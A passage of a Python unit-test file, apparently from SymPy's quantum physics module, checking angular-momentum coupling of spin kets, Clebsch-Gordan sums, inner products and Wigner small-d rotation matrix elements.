((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(3)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(3)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 3
- JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(3)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(3)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 3
- JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 2
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== 2
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
) == JzKetCoupled(
Rational(5, 2),
Rational(-5, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
def test_couple_symbolic():
assert couple(TensorProduct(JzKet(j1, m1), JzKet(j2, m2))) == Sum(
CG(j1, m1, j2, m2, j, m1 + m2) * JzKetCoupled(j, m1 + m2, (j1, j2)),
(j, m1 + m2, j1 + j2),
)
assert couple(TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3))) == Sum(
CG(j1, m1, j2, m2, j12, m1 + m2)
* CG(j12, m1 + m2, j3, m3, j, m1 + m2 + m3)
* JzKetCoupled(j, m1 + m2 + m3, (j1, j2, j3), ((1, 2, j12), (1, 3, j))),
(j12, m1 + m2, j1 + j2),
(j, m1 + m2 + m3, j12 + j3),
)
assert couple(
TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3)), ((1, 3), (1, 2))
) == Sum(
CG(j1, m1, j3, m3, j13, m1 + m3)
* CG(j13, m1 + m3, j2, m2, j, m1 + m2 + m3)
* JzKetCoupled(j, m1 + m2 + m3, (j1, j2, j3), ((1, 3, j13), (1, 2, j))),
(j13, m1 + m3, j1 + j3),
(j, m1 + m2 + m3, j13 + j2),
)
assert couple(
TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3), JzKet(j4, m4))
) == Sum(
CG(j1, m1, j2, m2, j12, m1 + m2)
* CG(j12, m1 + m2, j3, m3, j123, m1 + m2 + m3)
* CG(j123, m1 + m2 + m3, j4, m4, j, m1 + m2 + m3 + m4)
* JzKetCoupled(
j,
m1 + m2 + m3 + m4,
(j1, j2, j3, j4),
((1, 2, j12), (1, 3, j123), (1, 4, j)),
),
(j12, m1 + m2, j1 + j2),
(j123, m1 + m2 + m3, j12 + j3),
(j, m1 + m2 + m3 + m4, j123 + j4),
)
assert couple(
TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3), JzKet(j4, m4)),
((1, 2), (3, 4), (1, 3)),
) == Sum(
CG(j1, m1, j2, m2, j12, m1 + m2)
* CG(j3, m3, j4, m4, j34, m3 + m4)
* CG(j12, m1 + m2, j34, m3 + m4, j, m1 + m2 + m3 + m4)
* JzKetCoupled(
j,
m1 + m2 + m3 + m4,
(j1, j2, j3, j4),
((1, 2, j12), (3, 4, j34), (1, 3, j)),
),
(j12, m1 + m2, j1 + j2),
(j34, m3 + m4, j3 + j4),
(j, m1 + m2 + m3 + m4, j12 + j34),
)
assert couple(
TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3), JzKet(j4, m4)),
((1, 3), (1, 4), (1, 2)),
) == Sum(
CG(j1, m1, j3, m3, j13, m1 + m3)
* CG(j13, m1 + m3, j4, m4, j134, m1 + m3 + m4)
* CG(j134, m1 + m3 + m4, j2, m2, j, m1 + m2 + m3 + m4)
* JzKetCoupled(
j,
m1 + m2 + m3 + m4,
(j1, j2, j3, j4),
((1, 3, j13), (1, 4, j134), (1, 2, j)),
),
(j13, m1 + m3, j1 + j3),
(j134, m1 + m3 + m4, j13 + j4),
(j, m1 + m2 + m3 + m4, j134 + j2),
)
def test_innerproduct():
assert InnerProduct(JzBra(1, 1), JzKet(1, 1)).doit() == 1
assert (
InnerProduct(JzBra(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))).doit() == 0
)
assert InnerProduct(JzBra(j, m), JzKet(j, m)).doit() == 1
assert InnerProduct(JzBra(1, 0), JyKet(1, 1)).doit() == I / sqrt(2)
assert (
InnerProduct(JxBra(S.Half, S.Half), JzKet(S.Half, S.Half)).doit()
== -sqrt(2) / 2
)
assert InnerProduct(JyBra(1, 1), JzKet(1, 1)).doit() == S.Half
assert InnerProduct(JxBra(1, -1), JyKet(1, 1)).doit() == 0
def test_rotation_small_d():
# Symbolic tests
# j = 1/2
assert Rotation.d(S.Half, S.Half, S.Half, beta).doit() == cos(beta / 2)
assert Rotation.d(S.Half, S.Half, Rational(-1, 2), beta).doit() == -sin(beta / 2)
assert Rotation.d(S.Half, Rational(-1, 2), S.Half, beta).doit() == sin(beta / 2)
assert Rotation.d(S.Half, Rational(-1, 2), Rational(-1, 2), beta).doit() == cos(
beta / 2
)
# j = 1
assert Rotation.d(1, 1, 1, beta).doit() == (1 + cos(beta)) / 2
assert Rotation.d(1, 1, 0, beta).doit() == -sin(beta) / sqrt(2)
assert Rotation.d(1, 1, -1, beta).doit() == (1 - cos(beta)) / 2
assert Rotation.d(1, 0, 1, beta).doit() == sin(beta) / sqrt(2)
assert Rotation.d(1, 0, 0, beta).doit() == cos(beta)
assert Rotation.d(1, 0, -1, beta).doit() == -sin(beta) / sqrt(2)
assert Rotation.d(1, -1, 1, beta).doit() == (1 - cos(beta)) / 2
assert Rotation.d(1, -1, 0, beta).doit() == sin(beta) / sqrt(2)
assert Rotation.d(1, -1, -1, beta).doit() == (1 + cos(beta)) / 2
# j = 3/2
assert (
Rotation.d(S(3) / 2, Rational(3, 2), Rational(3, 2), beta).doit()
== (3 * cos(beta / 2) + cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), S(3) / 2, S.Half, beta).doit()
== -sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), S(3) / 2, Rational(-1, 2), beta).doit()
== sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), S(3) / 2, Rational(-3, 2), beta).doit()
== (-3 * sin(beta / 2) + sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), S(1) / 2, Rational(3, 2), beta).doit()
== sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(S(3) / 2, S.Half, S.Half, beta).doit()
== (cos(beta / 2) + 3 * cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(S(3) / 2, S.Half, Rational(-1, 2), beta).doit()
== (sin(beta / 2) - 3 * sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), S(1) / 2, Rational(-3, 2), beta).doit()
== sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), -S(1) / 2, Rational(3, 2), beta).doit()
== sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), -S(1) / 2, S.Half, beta).doit()
== (-sin(beta / 2) + 3 * sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), -S(1) / 2, Rational(-1, 2), beta).doit()
== (cos(beta / 2) + 3 * cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), -S(1) / 2, Rational(-3, 2), beta).doit()
== -sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(S(3) / 2, Rational(-3, 2), Rational(3, 2), beta).doit()
== (3 * sin(beta / 2) - sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), -S(3) / 2, S.Half, beta).doit()
== sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), -S(3) / 2, Rational(-1, 2), beta).doit()
== sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), -S(3) / 2, Rational(-3, 2), beta).doit()
== (3 * cos(beta / 2) + cos(beta * Rational(3, 2))) / 4
)
# j = 2
assert Rotation.d(2, 2, 2, beta).doit() == (3 + 4 * cos(beta) + cos(2 * beta)) / 8
assert Rotation.d(2, 2, 1, beta).doit() == -((cos(beta) + 1) * sin(beta)) / 2
assert Rotation.d(2, 2, 0, beta).doit() == sqrt(6) * sin(beta) ** 2 / 4
assert Rotation.d(2, 2, -1, beta).doit() == (cos(beta) - 1) * sin(beta) / 2
assert Rotation.d(2, 2, -2, beta).doit() == (3 - 4 * cos(beta) + cos(2 * beta)) / 8
assert Rotation.d(2, 1, 2, beta).doit() == (cos(beta) + 1) * sin(beta) / 2
assert Rotation.d(2, 1, 1, beta).doit() == (cos(beta) + cos(2 * beta)) / 2
assert Rotation.d(2, 1, 0, beta).doit() == -sqrt(6) * sin(2 * beta) / 4
assert Rotation.d(2, 1, -1, beta).doit() == (cos(beta) - cos(2 * beta)) / 2
assert Rotation.d(2, 1, -2, beta).doit() == (cos(beta) - 1) * sin(beta) / 2
assert Rotation.d(2, 0, 2, beta).doit() == sqrt(6) * sin(beta) ** 2 / 4
assert Rotation.d(2, 0, 1, beta).doit() == sqrt(6) * sin(2 * beta) / 4
assert Rotation.d(2, 0, 0, beta).doit() == (1 + 3 * cos(2 * beta)) / 4
assert Rotation.d(2, 0, -1, beta).doit() == -sqrt(6) * sin(2 * beta) / 4
assert Rotation.d(2, 0, -2, beta).doit() == sqrt(6) * sin(beta) ** 2 / 4
assert Rotation.d(2, -1, 2, beta).doit() == (2 * sin(beta) - sin(2 * beta)) / 4
assert Rotation.d(2, -1, 1, beta).doit() == (cos(beta) - cos(2 * beta)) / 2
assert Rotation.d(2, -1, 0, beta).doit() == sqrt(6) * sin(2 * beta) / 4
assert Rotation.d(2, -1, -1, beta).doit() == (cos(beta) + cos(2 * beta)) / 2
assert Rotation.d(2, -1, -2, beta).doit() == -((cos(beta) + 1) * sin(beta)) / 2
assert Rotation.d(2, -2, 2, beta).doit() == (3 - 4 * cos(beta) + cos(2 * beta)) / 8
